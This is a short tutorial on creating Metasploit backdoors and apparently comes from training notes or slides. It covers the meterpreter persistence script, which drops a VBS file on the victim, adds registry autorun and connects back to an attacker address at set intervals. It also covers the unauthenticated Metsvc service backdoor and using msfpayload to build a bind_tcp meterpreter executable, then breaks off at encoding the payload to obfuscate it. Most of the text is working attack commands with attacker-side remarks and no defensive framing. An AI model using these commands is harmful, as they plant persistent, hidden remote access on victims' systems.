Metasploit Backdoor Tutorial
Backdoor: Create persistence backdoor Can be configured to connect back on systemboot or user login Time can be set between connect back attemps Under the hood Create vbs file on the victim and excute it Add registry entries so it is autorun Can be uninstalled remotely Vbs file delete manually meterpreter > run persistence meterpreter > run persistence -A -U -i 10 -p 3000 -r 192.168.1.10 Metsvc backdoor Run as service on the victim Connect to it remotely No authentication required Can be remotely unintalled File need delete manually Less noisy compared to persistence Attacker can connect when he wants Can be found by portscaning Demo: Backdoor with Metsvc Create Executable from payloads Msfpayload Use: msfpayload [var=val] [S]umamry|[C]|[P]erl|Rub[y]|[R]aw|[J]avascript|e[X]ecuate|[D]ll|[V]BA|[W]ar; Ex: msfpayload windows/meterprete/bind_tcp RHOST=192.168.1.100 X | bind_tcp.exe Encoding to obfucate payload Encode payload to e